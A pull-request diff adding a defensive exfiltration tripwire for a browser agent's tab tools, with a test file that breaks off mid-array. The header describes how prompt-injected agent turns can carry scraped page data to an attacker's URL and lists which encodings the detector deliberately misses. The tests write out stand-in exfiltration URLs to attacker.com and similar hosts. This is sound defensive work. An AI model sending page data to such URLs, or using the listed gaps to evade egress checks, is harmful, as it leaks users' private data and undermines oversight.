### PR TITLE
feat(egress): pure tab-tool exfil heuristics (#243)

### DIFF
--- a/extension/peerd-runtime/tools/egress-heuristics.js
+++ b/extension/peerd-runtime/tools/egress-heuristics.js
@@ -1,0 +1,321 @@
+// @ts-check
+// egress-heuristics — best-effort detection of the DOM-data→URL
+// exfiltration shape in TAB-TOOL arguments. A TRIPWIRE, not a proof.
+//
+// WHY THIS EXISTS (#243). The egress-allowlist PreToolUse hook
+// (tools/hooks/defaults/egress-allowlist.js) governs the agent's OWN
+// outbound fetches, but EXEMPTS every primitive:'tab' tool — those act on
+// the user's logged-in browser, which is peerd's whole thesis. That
+// exemption is a gap: a prompt-injected turn can smuggle scraped page data
+// OUT through a tab tool by navigating (or typing) to a URL that carries the
+// data — `attacker.com/?data=<scraped>`, `attacker.com/<scraped>`,
+// `attacker.com/#<scraped>`, `https://<scraped>@attacker.com/` (userinfo,
+// sent as an Authorization: Basic header), or `https://<scraped>.attacker.com/`
+// (DNS-label exfil — the host leaks to the attacker's authoritative DNS +
+// TLS SNI + Host header). The URL is off-origin and the tab stack never
+// looked at it. This module is the ARGS-half tripwire for that shape.
+//
+// WHAT IT IS / IS NOT — read this before trusting it. It is a PURE function
+// producing allow | block from (name, args, currentOrigin). It is a
+// BEST-EFFORT TRIPWIRE layered UNDER the real containment, NOT a guarantee:
+//   - #241 — the schema boundary that keeps untrusted content out of the
+//     tool-arg surface in the first place;
+//   - #242 — read-only downscale of user-generated content + the offscreen
+//     HEAP FENCE (untrusted reasoning never holds the vault DK / authority).
+// Those are the defenses that actually contain exfiltration. This heuristic
+// is a cheap extra veto that catches the OBVIOUS shape early. Because it is
+// not the floor, it is deliberately CONSERVATIVE — it ALLOWS on any
+// uncertainty and only BLOCKS a clear payload — since a false block breaks
+// the legitimate "read a page, then follow a link on it" flow that is the
+// whole point of a browser agent.
+//
+// DETECTION MODEL — a single DOMINANT high-entropy run over the off-origin
+// http(s) destination's three LOW-FALSE-POSITIVE slots: USERINFO, HOSTNAME,
+// and PATH. Split each into runs of the URL-SAFE alphabet `A-Za-z0-9_-` (so
+// `+`, `/`, `.`, `=`, `&`, space … are run boundaries), keep runs whose local
+// entropy clears the bar, and BLOCK when the LONGEST such run reaches
+// MIN_BLOB_LENGTH. A scraped-DOM payload dumped into one of these slots is one
+// long contiguous token — a shape that has essentially NO legitimate
+// population in userinfo or hostname, and only rare ones in a path.
+//
+// WHY ONLY THESE THREE SLOTS — the query and fragment are DELIBERATELY NOT
+// scanned. That is the load-bearing decision, learned the hard way: the query
+// and fragment are where legitimate long high-entropy tokens LIVE, and they
+// are INDISTINGUISHABLE from an exfil blob by length or entropy —
+//   • an OIDC `id_token` (a base64url JWT, often 300–800 chars) returned in
+//     the fragment by the implicit/hybrid flow;
+//   • a SAML `SAMLRequest` (DEFLATE + standard base64), 200–800 chars;
+//   • base64url SPA continuation / pagination tokens on every infinite scroll;
+//   • presigned-URL signatures (a GCS V4 `X-Goog-Signature` is 512 hex chars).
+// Scanning the query/fragment would FALSE-BLOCK federated login and ordinary
+// SPA navigation — a prime-directive violation for a browser agent (this
+// module errs toward allow; a false block breaks the user's browsing, a false
+// negative is backstopped by #241/#242). Userinfo and hostname carry no such
+// legitimate blobs, and a path is normally `/`-segmented into short pieces, so
+// those three slots flag the exfil shape without breaking real flows.
+//
+// HONEST about what spares a path: NOT readability — it is the `/` boundaries
+// and the 100-char length bar. Readable English runs ~4.0 bits/char, well over
+// the 3.5 gate, so a SINGLE `/`-segment of ≥100 chars is flagged whether it is
+// a base64 blob or a hyphen/underscore-joined slug. Real slugs/titles cluster
+// at 70–95 chars and pass; a rare ≥100-char single readable segment does not.
+// That, plus a large-multihash IPFS subdomain CID collapsing past 100 in the
+// host, is the accepted-cost false block below — legitimacy does not exempt a
+// run, only its length and the `/`·`.` boundaries do.
+//
+// WHY URL-SAFE alphabet, and why the HOSTNAME is dot-collapsed:
+//   - base64url + hex are the URL-SAFE encodings a WORKING URL exfil uses
+//     (they survive transit intact). `+`/`/` are run BOUNDARIES because they
+//     are URL/form-structural — which lets a deep READABLE path split per `/`
+//     segment (no false block). A STANDARD base64 (`btoa`, `+/`) blob thus
+//     self-fragments and is a residual, but that is moot here: it would only
+//     matter in the query/fragment, which we do not scan anyway.
+//   - the hostname is scanned with its DOTS REMOVED (labels concatenated) so a
+//     payload chunked across DNS labels (`<h1>.<h2>.<h3>.attacker.com`, each
+//     ≤63 by protocol) re-fuses into one run instead of evading on the dots. A
+//     normal hostname collapses to a short / low-entropy string, never tripped.
+//
+// WHY DOMINANT-RUN AND NOT SUMMED VOLUME. Measuring only the LONGEST run (not
+// the sum) is what keeps a path that legitimately carries several independent
+// high-entropy segments from being blocked for their combined length; only a
+// single dumped blob trips it. (Summing was an earlier revision; it and query-
+// scanning both false-blocked OAuth/OIDC-family flows, which is why neither
+// survives.)
+//
+// KNOWN RESIDUALS — do NOT read this as complete coverage:
+//   1. THE QUERY AND FRAGMENT. `attacker.com/?d=<blob>` / `#<blob>` is NOT
+//      caught — see WHY ONLY THESE THREE SLOTS. This is the largest residual,
+//      a deliberate trade to never false-block a login/navigation; #242 is the
+//      containment.
+//   2. FRAGMENTATION. A payload split across separators so no single run
+//      reaches MIN_BLOB_LENGTH (`.`-separated path/label runs, standard-base64
+//      `+/` self-fragmentation, fine sub-entropy runs) evades.
+//   3. LOW-ENTROPY or SMALL payloads. Data whose OWN entropy is under the gate
+//      (a repeated segment, a short natural-language leak) or a single
+//      high-entropy token under MIN_BLOB_LENGTH slips through — entropy
+//      detection cannot see data that does not look random.
+// All residuals are contained by #241/#242. A rare legitimate LONG single run
+// that DOES trip the wire — a ≥100-char single PATH segment (an email
+// click-tracking wrapper, a magic-link, a path-embedded JWT, OR a genuinely
+// long readable slug/title), or a large-multihash IPFS subdomain CID that
+// collapses past 100 chars in the HOST — is the accepted cost of catching the
+// contiguous-blob shape; #242 is the real containment.
+//
+// SCOPE. Tab-tool ARGS only. It does NOT cover the page-emitted
+// `<img src="attacker.com/?d=…">` beacon vector: that data leaves via the
+// page's own network stack, not a tab-tool arg, so no arg-inspection can see
+// it. Beacons need a declarativeNetRequest layer — a separate follow-up.
+
+/** @typedef {{ action: 'allow' } | { action: 'block', reason: string }} EgressVerdict */
+
+/**
+ * The description of a tab-tool call to inspect. Args are the raw,
+ * model-supplied tool arguments; currentOrigin is the origin of the tab the
+ * call would act on (absent before any page has loaded).
+ * @typedef {Object} TabToolCall
+ * @property {string} [name]
+ * @property {Record<string, unknown> | null | undefined} [args]
+ * @property {string | null | undefined} [currentOrigin]
+ */
+
+// Arg fields that can carry a destination URL across the tab tools. `url`
+// is navigate's destination; `text`/`value` are what `type` sets (an exfil
+// vector only when the typed value itself parses as an absolute URL, e.g.
+// pasted into an address-bar-like field). Non-URL values (ordinary search
+// strings) simply fail the URL parse below and are ignored.
+const URL_ARG_FIELDS = ['url', 'text', 'value', 'href'];
+
+// Only http(s) destinations can carry a working cross-origin GET exfil.
+// data:/blob:/javascript: are navigate-rejected anyway (navigate.js) and
+// carry no host to exfiltrate TO — skip them.
+const HTTP_SCHEMES = new Set(['http:', 'https:']);
+
+// why: 100 chars in ONE surviving high-entropy run. A scraped-DOM payload
+// worth moving is far larger and lands as one contiguous token; ordinary
+// off-origin values (a search term, a page/share id, a single content hash,
+// an OAuth code_challenge/state, a git SHA, an IPFS CID) each stay well under
+// this in any single run. The bar is set high on purpose so ordinary links
+// pass untouched — this is a tripwire beneath #241/#242, not the sole gate,
+// so it errs hard toward allow.
+const MIN_BLOB_LENGTH = 100;
+
+// why: a run must clear this per-character entropy to count. URL-safe encoded
+// data is high-entropy (base64url ~5–6 bits, random hex ~3.9); low-variety
+// strings — a zero-padded id, an 'aaaa…' padding block, a pure-digit timestamp
+// (log2 10 ≈ 3.32), a short natural word — fall below 3.5 and are DROPPED
+// before they can count as a payload run. Note the SIDE EFFECT that this
+// replaces a hard length floor: entropy over a short run is mechanically low
+// (a distinct-char run of length N caps at log2 N, so ~≤11 chars can't clear
+// 3.5), so short benign runs self-exclude.
+const MIN_RUN_ENTROPY_BITS = 3.5;
+
+// The run alphabet — base64url + hex. `+`/`/`/`.`/`=`/`&`/space are run
+// BOUNDARIES (see "WHY URL-SAFE-ONLY" in the header). A maximal span of these
+// chars is one run; anything else splits it.
+const RUN_SPLIT = /[^A-Za-z0-9_-]+/;
+
+/**
+ * Shannon entropy of a string in bits per character. High for encoded
+ * arbitrary data, low for repetitive or narrow-alphabet strings.
+ * @param {string} str
+ * @returns {number}
+ */
+const shannonEntropyBits = (str) => {
+  if (!str) return 0;
+  /** @type {Map<string, number>} */
+  const counts = new Map();
+  for (const ch of str) counts.set(ch, (counts.get(ch) ?? 0) + 1);
+  let bits = 0;
+  for (const count of counts.values()) {
+    const p = count / str.length;
+    bits -= p * Math.log2(p);
+  }
+  return bits;
+};
+
+/**
+ * Percent-decode, never throwing. why: a malformed `%` sequence must degrade
+ * to the raw string, never crash the inspector.
+ * @param {string} str
+ * @returns {string}
+ */
+const safeDecode = (str) => {
+  try { return decodeURIComponent(str); } catch { return str; }
+};
+
+/**
+ * The three LOW-FALSE-POSITIVE payload-bearing slots of a URL, decoded into the
+ * canonical form the run scanner reads. why each (and why NOT query/fragment —
+ * see the header's "WHY ONLY THESE THREE SLOTS"):
+ *  - userinfo (username/password): `https://<blob>@host/` ships the blob as an
+ *    Authorization: Basic header to the attacker host. No legit blob lives here.
+ *  - hostname with DOTS REMOVED: re-fuses a payload chunked across DNS labels
+ *    so `<h1>.<h2>.<h3>.attacker.com` is one run, not per-label sub-100 runs.
+ *    A normal hostname collapses to a short/low-entropy string.
+ *  - path (plain percent-decode; `+` is literal in a path). `/` splits it into
+ *    segments, so only a lone ≥100-char high-entropy segment trips it — readable
+ *    or opaque; readability does not exempt a run, its length does.
+ * @param {URL} url
+ * @returns {string[]}
+ */
+const payloadSlots = (url) => [
+  safeDecode(url.username),
+  safeDecode(url.password),
+  url.hostname.replace(/\./g, ''),
+  safeDecode(url.pathname),
+];
+
+/**
+ * Length of the LONGEST run (across the slots) whose local entropy clears
+ * MIN_RUN_ENTROPY_BITS. MAX not SUM — a URL carrying several independent
+ * high-entropy values (an OAuth PKCE authorize URL) is not blocked for their
+ * combined length; only a single dumped blob trips it. See "WHY DOMINANT-RUN".
+ * @param {string[]} slots
+ * @returns {number}
+ */
+const largestExfilRun = (slots) => {
+  let longest = 0;
+  for (const slot of slots) {
+    for (const run of slot.split(RUN_SPLIT)) {
+      // why `run.length <= longest` first: a run that cannot raise the max is
+      // irrelevant, so skip the entropy math for it (never changes the verdict).
+      if (!run || run.length <= longest) continue;
+      if (shannonEntropyBits(run) < MIN_RUN_ENTROPY_BITS) continue;
+      longest = run.length;
+    }
+  }
+  return longest;
+};
+
+/**
+ * Parse an origin, returning null if unparseable. why: a missing/garbled
+ * currentOrigin must not throw — it degrades to "treat as off-origin and
+ * inspect", never a crash.
+ * @param {string} value
+ * @returns {string | null}
+ */
+const safeOrigin = (value) => {
+  try { return new URL(value).origin; } catch { return null; }
+};
+
+/**
+ * Collect the URL-bearing arg values from a tab-tool call.
+ * @param {Record<string, unknown> | null | undefined} args
+ * @returns {string[]}
+ */
+const collectCandidateUrls = (args) => {
+  if (!args || typeof args !== 'object') return [];
+  /** @type {string[]} */
+  const out = [];
+  for (const field of URL_ARG_FIELDS) {
+    const value = /** @type {Record<string, unknown>} */ (args)[field];
+    if (typeof value === 'string' && value.trim()) out.push(value.trim());
+  }
+  return out;
+};
+
+/**
+ * Inspect a tab-tool call for the DOM-data→URL exfiltration shape.
+ *
+ * Returns `{ action: 'block', reason }` when the call would navigate/type an
+ * OFF-origin http(s) URL whose userinfo, hostname, or path carries a single
+ * URL-safe-encoded high-entropy run of ≥ MIN_BLOB_LENGTH characters — a
+ * contiguous dumped blob. Everything else is `{ action: 'allow' }`, including
+ * same-origin targets, plain off-origin links (incl. deep readable paths), a
+ * blob in the QUERY or FRAGMENT (the largest documented residual — those slots
+ * are not scanned; see the header), non-URL typed text, empty/short args, a
+ * lone sub-threshold token, fragmented / low-entropy payloads, and any call
+ * made before a page has loaded.
+ *
+ * NEVER THROWS — a pure inspector on a hot path. Any non-object `call`
+ * (including `null`) degrades to allow, matching every other odd-input path.
+ *
+ * The `reason` is CONTENT-FREE by construction — it never interpolates the
+ * URL, the blob, or any other attacker-controlled bytes. why: reasons are
+ * audited and read back UN-fenced; echoing attacker bytes into an audit log
+ * that a human or the agent later re-reads would reopen the injection channel
+ * this gate exists to close. It also does NOT claim to catch the residuals —
+ * see KNOWN RESIDUALS in the header.
+ *
+ * @param {TabToolCall | null} [call]
+ * @returns {EgressVerdict}
+ */
+export const inspectTabToolCall = (call) => {
+  // why: the default param only covers `undefined`; a caller that represents
+  // an absent record as `null` must not crash the destructure. Any non-object
+  // is "nothing to inspect" → allow.
+  const safeCall = (call && typeof call === 'object') ? call : {};
+  const { args, currentOrigin } = safeCall;
+  const candidates = collectCandidateUrls(args);
+  if (!candidates.length) return { action: 'allow' };
+
+  // why: no current origin means no page has loaded on this tab yet (e.g.
+  // the web actor's first navigation from a tabless start). Nothing has been
+  // scraped, so there is nothing to exfiltrate — allow. Exfil presupposes a
+  // page already read, which always leaves a currentOrigin behind.
+  if (!currentOrigin) return { action: 'allow' };
+  const here = safeOrigin(currentOrigin);
+
+  for (const raw of candidates) {
+    let url;
+    try { url = new URL(raw); }
+    catch { continue; } // unparseable / relative → not a working exfil vector
+    if (!HTTP_SCHEMES.has(url.protocol)) continue;
+    // Same-origin is trivially allowed: sending data back to the site the
+    // agent is already on is not cross-origin exfiltration. (If currentOrigin
+    // was unparseable, `here` is null and we treat every target as off-origin
+    // — inspect it; we still only block on a clear payload.)
+    if (here && url.origin === here) continue;
+    if (largestExfilRun(payloadSlots(url)) >= MIN_BLOB_LENGTH) {
+      return {
+        action: 'block',
+        // why: content-free — see the doc comment above. Names the SHAPE,
+        // never the bytes, and claims only "likely", not a guarantee.
+        reason: 'egress-heuristics: off-origin tab navigation carrying a high-entropy '
+          + 'encoded payload in the URL userinfo/host/path — the likely '
+          + 'DOM-data exfiltration shape',
+      };
+    }
+  }
+  return { action: 'allow' };
+};

--- a/packaging/check-tscheck.ts
+++ b/packaging/check-tscheck.ts
@@ -87,7 +87,9 @@ import { computeCoverage } from './tscheck-coverage.ts';
 // 505/506 → 510: the #119 (page bridge + OM2W eval) and #187 (fetch content
 // pipeline) file sets merge — both ledgers above are kept; the union floor.
 // 510 → 511: the Z.ai GLM provider adapter (peerd-provider/adapters/glm.js).
-const COVERED_FLOOR = 530;
+// 530 → 531: #243's pure tab-tool exfil heuristics
+// (peerd-runtime/tools/egress-heuristics.js).
+const COVERED_FLOOR = 531;
 
 // The scan (walk + // @ts-check detection + the ES5-injected exemption set)
 // lives in tscheck-coverage.ts so the badge generator reports the same number.

--- a/tests/peerd-runtime/tools/egress-heuristics.test.ts
+++ b/tests/peerd-runtime/tools/egress-heuristics.test.ts
@@ -1,0 +1,405 @@
+// #243 — the PURE args-half tripwire of the tab-tool egress firewall. These
+// tests pin BOTH surfaces of a deliberately conservative bargain:
+//   - the exfil shape in a LOW-FALSE-POSITIVE slot (a single contiguous
+//     URL-safe-encoded high-entropy blob in an OFF-origin URL's USERINFO,
+//     HOSTNAME — incl. chunked across DNS labels — or PATH) is BLOCKED;
+//   - legitimate off-origin navigation is ALLOWED, tested against REAL benign
+//     shapes AND against the deliberate residual: a blob in the QUERY or
+//     FRAGMENT is NOT scanned (that is where legit OIDC id_tokens, SAML
+//     requests, continuation tokens, and presigned signatures live — all
+//     indistinguishable from an exfil blob), so federated login and SPA
+//     navigation are never false-blocked.
+//
+// Detection is a single DOMINANT high-entropy run (MAX not SUM): the LONGEST
+// URL-safe (`A-Za-z0-9_-`) run, entropy ≥ 3.5 bits/char, across
+// userinfo+hostname+path; block at >= 100. The hostname is scanned dot-collapsed
+// so DNS-label chunking re-fuses. KNOWN RESIDUALS (pinned below, contained by
+// #241/#242, NOT bugs): the QUERY/FRAGMENT slots (deliberately unscanned),
+// FRAGMENTATION (no single run reaches 100), and LOW-ENTROPY / small payloads.
+// This layer is a tripwire under the real containment, not a proof.
+
+import { describe, test, expect } from 'bun:test';
+import { inspectTabToolCall } from '../../../extension/peerd-runtime/tools/egress-heuristics.js';
+
+// A ~340-char base64url-ish blob (no `+`/`/`) — the shape a scraped-DOM payload
+// takes when URL-safe encoded, the encoding a working URL exfil uses.
+const SCRAPED_BLOB =
+  'eyJ1c2VyIjoiYWRtaW4iLCJlbWFpbCI6ImFkbWluQGV4YW1wbGUuY29tIiwic2Vzc2lvbiI6'
+  + 'ImFiYzEyM2RlZjQ1NmdoaTc4OWprbDAxMm1ubzM0NXBxcjY3OHN0dTkwMHZ3eHl6IiwiY3Ny'
+  + 'ZiI6Ijk4NzY1NDMyMTBhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5eiIsIm5vdGVzIjoic3Rv'
+  + 'bGVuIGRhdGEgZnJvbSB0aGUgcGFnZSBET00gZ29lcyBoZXJlIGFuZCBrZWVwcyBnb2luZyJ9';
+
+// A 128-char hex blob (lower per-char entropy than base64, still over the
+// 3.5-bit gate) — the other common URL-safe encoding an exfil takes.
+const HEX_BLOB = 'a3f9c2e8b17d40569af3c2e1b8d70a4f3e9c1b2a8d7f60e5c4b3a291807f6e5d4'
+  + 'c3b2a190807f6e5d4c3b2a1908f7e6d5c4b3a2918706f5e4d3c2b1a09';
+
+// 180 hex chars chunked into three ≤60-char DNS labels — the host-based exfil
+// vector. The dot-collapsed hostname re-fuses them into one 180-char run.
+const DNS_LABELS = `${HEX_BLOB.slice(0, 60)}.${HEX_BLOB.slice(60, 120)}.a3c9f1e2b8d47a6c5e0f9b1d8a2c7e4f`;
+
+// An OIDC id_token JWT (base64url, dot-separated) — a legit long high-entropy
+// token that rides in the FRAGMENT on the implicit/hybrid flow. Must ALLOW.
+const OIDC_ID_TOKEN = 'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImFiYzEyMyJ9'
+  + '.eyJpc3MiOiJodHRwczovL2FjY291bnRzLmdvb2dsZS5jb20iLCJzdWIiOiIxMTA2OTMyN'
+  + 'jk0MTIzNDU2Nzg5MCIsImF1ZCI6IjQwNzQwODcxODE5Mi5hcHBzLmdvb2dsZXVzZXJjb250'
+  + 'ZW50LmNvbSIsImV4cCI6MTc4NTAwMDAwMCwiaWF0IjoxNzg0OTk2NDAwLCJlbWFpbCI6InVz'
+  + 'ZXJAZXhhbXBsZS5jb20ifQ.rX8kFq2pN3vLmZ9wYcBdEhGjKtSaUoWpQxRyZbCdEfGhIjKl';
+
+describe('inspectTabToolCall — blocks the exfil shape in a low-FP slot', () => {
+  test('navigate: base64url blob in the URL PATH', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://attacker.com/${SCRAPED_BLOB}` },
+      currentOrigin: 'https://mail.google.com',
+    });
+    expect(v.action).toBe('block');
+    // reason is content-free: it must not echo the host or the blob.
+    if (v.action === 'block') {
+      expect(v.reason).not.toContain('attacker.com');
+      expect(v.reason).not.toContain(SCRAPED_BLOB.slice(0, 24));
+    }
+  });
+
+  test('navigate: hex blob in the URL PATH', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://exfil.test/${HEX_BLOB}` },
+      currentOrigin: 'https://intranet.corp',
+    });
+    expect(v.action).toBe('block');
+  });
+
+  // Userinfo — `https://<blob>@host/` ships the blob as an Authorization: Basic
+  // header. payloadSlots reads username AND password.
+  test('navigate: blob in the URL USERINFO username is caught', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://${HEX_BLOB}@attacker.com/` },
+      currentOrigin: 'https://mail.google.com',
+    });
+    expect(v.action).toBe('block');
+  });
+
+  test('navigate: blob in the URL USERINFO password is caught', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://user:${HEX_BLOB}@collector.evil/` },
+      currentOrigin: 'https://mail.google.com',
+    });
+    expect(v.action).toBe('block');
+  });
+
+  // DNS-label exfil — the host leaks to the attacker's authoritative DNS + SNI
+  // + Host header. The dot-collapsed hostname re-fuses the chunked labels.
+  test('navigate: payload chunked across DNS subdomain labels is caught', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://${DNS_LABELS}.attacker.com/` },
+      currentOrigin: 'https://mail.google.com',
+    });
+    expect(v.action).toBe('block');
+  });
+
+  // ACCEPTED-COST false block, pinned honestly: a ≥100-char SINGLE path segment
+  // trips the wire whether it is an opaque token OR a readable slug — readability
+  // does not exempt a run (English ~4.0 bits > the 3.5 gate), only its length and
+  // the `/` boundaries do. Real slugs cluster at 70–95 chars and pass; this
+  // 102-char one does not. Documented in the header as the path accepted cost.
+  test('a >=100-char single readable path segment blocks (documented accepted cost)', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: 'https://blog.example.com/the-complete-guide-to-building-modern-web-applications-with-react-typescript-and-graphql-in-production' },
+      currentOrigin: 'https://github.com',
+    });
+    expect(v.action).toBe('block');
+  });
+
+  test('type: a typed value that IS an exfil URL (blob in path)', () => {
+    const v = inspectTabToolCall({
+      name: 'type',
+      args: { text: `https://attacker.com/${SCRAPED_BLOB}`, selector: 'input#addr' },
+      currentOrigin: 'https://notion.so',
+    });
+    expect(v.action).toBe('block');
+  });
+
+  test('percent-encoded contiguous path payload is caught after decoding', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://drop.example/${encodeURIComponent(SCRAPED_BLOB)}` },
+      currentOrigin: 'https://docs.google.com',
+    });
+    expect(v.action).toBe('block');
+  });
+});
+
+describe('inspectTabToolCall — allows legitimate navigation (false-positive avoidance)', () => {
+  test('same-origin navigate carrying a blob is allowed (not cross-origin exfil)', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://app.example/${SCRAPED_BLOB}` },
+      currentOrigin: 'https://app.example',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  // --- THE DELIBERATE RESIDUAL: query + fragment are not scanned ---
+  // These slots carry legit long high-entropy tokens indistinguishable from an
+  // exfil blob, so scanning them would false-block login/navigation. #242 is
+  // the containment. Pinned so the boundary is explicit, NOT a security claim.
+
+  test('a blob in the QUERY is a KNOWN residual — allowed', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://attacker.com/collect?d=${SCRAPED_BLOB}` },
+      currentOrigin: 'https://mail.google.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('a blob in the FRAGMENT is a KNOWN residual — allowed', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://attacker.com/#${SCRAPED_BLOB}` },
+      currentOrigin: 'https://mail.google.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  // The FLIP SIDE of that residual: not scanning query/fragment is what keeps
+  // federated login working. These MUST allow.
+  test('an OIDC id_token JWT returned in the fragment is allowed (implicit flow)', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://app.example/callback#id_token=${OIDC_ID_TOKEN}&token_type=bearer` },
+      currentOrigin: 'https://accounts.google.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('a SAML SP-initiated SSO request (standard base64 in query) is allowed', () => {
+    // Standard base64 (DEFLATE + b64), percent-encoded — the SP-initiated
+    // HTTP-Redirect binding. In the (unscanned) query, so it must allow.
+    const samlReq = encodeURIComponent(
+      'fVLLbtswELz7KwjeLYmSbFmEZSNNEDRA2hpx2kMuAU2tHKESqXKpJP37UpLTBGh'
+      + 'zJXdmZ2dnl0IatuPXeCqfmXvw7dCFVQeuMxN3rXFXbdfNfXpqqUEXtF3Q9k2n0'
+      + 'kU2G2XZ50vFsRktC5oXi5xnvJgTfMqB3wJJluU85oktMprXOMY5xnJEyzPMEZ',
+    );
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://idp.corp.example.com/idp/SSO?SAMLRequest=${samlReq}&RelayState=session` },
+      currentOrigin: 'https://app.example.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('a presigned URL signature in the query is allowed (GCS 512-hex X-Goog-Signature)', () => {
+    const sig = 'a3f9c2e8b17d40569af3c2e1b8d70a4f'.repeat(16); // 512 hex chars
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://storage.googleapis.com/bucket/report.pdf?X-Goog-Algorithm=GOOG4-RSA-SHA256&X-Goog-Signature=${sig}` },
+      currentOrigin: 'https://app.example.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  // --- REAL benign shapes, hardened against the run model ---
+
+  test('modern OAuth/OIDC PKCE authorize URLs are allowed (Google/Microsoft/Auth0)', () => {
+    const urls = [
+      'https://accounts.google.com/o/oauth2/v2/auth?response_type=code'
+        + '&client_id=407408718192.apps.googleusercontent.com'
+        + '&redirect_uri=https%3A%2F%2Fexample.com%2Fcallback&scope=openid%20email%20profile'
+        + '&state=af0ifjsldkj3nOaXcvb8s7'
+        + '&code_challenge=E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM'
+        + '&code_challenge_method=S256&nonce=n-0S6_WzA2Mj',
+      'https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=6731de76-14a6-49ae-97bc-6eba6914391e'
+        + '&response_type=code&redirect_uri=https%3A%2F%2Fapp.example%2Fcb&response_mode=query'
+        + '&scope=openid%20profile%20offline_access&state=12345abcdeSTATEvalue678'
+        + '&code_challenge=YTFjMjM0NTZiNzg5MGRlZmdoaWprbG1ub3BxcnN0dXY&code_challenge_method=S256',
+    ];
+    for (const url of urls) {
+      const v = inspectTabToolCall({ name: 'navigate', args: { url }, currentOrigin: 'https://myapp.example' });
+      expect(v.action).toBe('allow');
+    }
+  });
+
+  // Pass splits on `/`, so a deep READABLE multi-segment path (docs, nested
+  // source files) does NOT glue into one long run and is not false-blocked,
+  // even past 100 chars total.
+  test('deep readable multi-segment paths (>100 chars) are allowed', () => {
+    for (const url of [
+      'https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AmazonEC2/instances/launching/configuration/networking/security-groups/rules.html',
+      'https://kubernetes.io/docs/concepts/services-networking/ingress/configuration/annotations/nginx/rewrite-target/examples/index.html',
+      'https://github.com/torvalds/linux/blob/master/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c',
+    ]) {
+      const v = inspectTabToolCall({ name: 'navigate', args: { url }, currentOrigin: 'https://github.com' });
+      expect(v.action).toBe('allow');
+    }
+  });
+
+  test('a content-hash path (single git SHA) is allowed', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: 'https://cdn.example/assets/9f8b7a6c5d4e3f2a1b0c9d8e7f6a5b4c3d2e1f0a/app.js' },
+      currentOrigin: 'https://github.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('an IPFS CID path segment is allowed', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: 'https://ipfs.io/ipfs/QmYwAPJzv5CZsnA625s3Xf2nemtYgPpHdWEz79ojWnPbdG' },
+      currentOrigin: 'https://github.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('a normal random-subdomain hostname is allowed', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: 'https://d1a2b3c4e5f6g7.cloudfront.net/app.js' },
+      currentOrigin: 'https://github.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('a short userinfo (user:pass) off-origin is allowed', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: 'https://alice:hunter2@example.com/dashboard' },
+      currentOrigin: 'https://github.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  // Documented residual: a LONE sub-threshold secret (< 100 chars in one
+  // high-entropy run) slips through — #241/#242 are the containment.
+  test('a lone sub-threshold token off-origin path is allowed (accepted residual)', () => {
+    const shortToken = HEX_BLOB.slice(0, 40); // 40 high-entropy chars, < 100
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://other.example/ref/${shortToken}` },
+      currentOrigin: 'https://github.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  // Documented residual: FRAGMENTATION. A path payload split so no single
+  // segment reaches 100 evades. Pinned so the boundary is explicit.
+  test('"."-separated fragmented path payload is a KNOWN residual — allowed', () => {
+    const chunks = [];
+    for (let i = 0; i < SCRAPED_BLOB.length; i += 20) chunks.push(SCRAPED_BLOB.slice(i, i + 20));
+    const url = `https://attacker.com/${chunks.join('.')}`;
+    const v = inspectTabToolCall({ name: 'navigate', args: { url }, currentOrigin: 'https://mail.google.com' });
+    expect(v.action).toBe('allow');
+  });
+
+  test('plain off-origin link found in a README is allowed', () => {
+    for (const url of [
+      'https://example.com/docs/getting-started',
+      'https://reactjs.org/docs/hooks-intro.html',
+      'https://news.ycombinator.com/item?id=38290000',
+      'https://en.wikipedia.org/wiki/Transport_Layer_Security',
+      'https://github.com/anthropics/peerd/blob/main/README.md#installation',
+    ]) {
+      const v = inspectTabToolCall({
+        name: 'navigate',
+        args: { url },
+        currentOrigin: 'https://github.com',
+      });
+      expect(v.action).toBe('allow');
+    }
+  });
+
+  test('ordinary off-origin search / utm / short-id params are allowed', () => {
+    for (const url of [
+      'https://www.google.com/search?q=how+to+center+a+div',
+      'https://shop.example/products?category=shoes&sort=price&page=3',
+      'https://example.com/?utm_source=github&utm_medium=readme&utm_campaign=launch',
+      'https://youtube.com/watch?v=dQw4w9WgXcQ',
+      'https://example.com/share/9f8b7a6c',
+    ]) {
+      const v = inspectTabToolCall({
+        name: 'navigate',
+        args: { url },
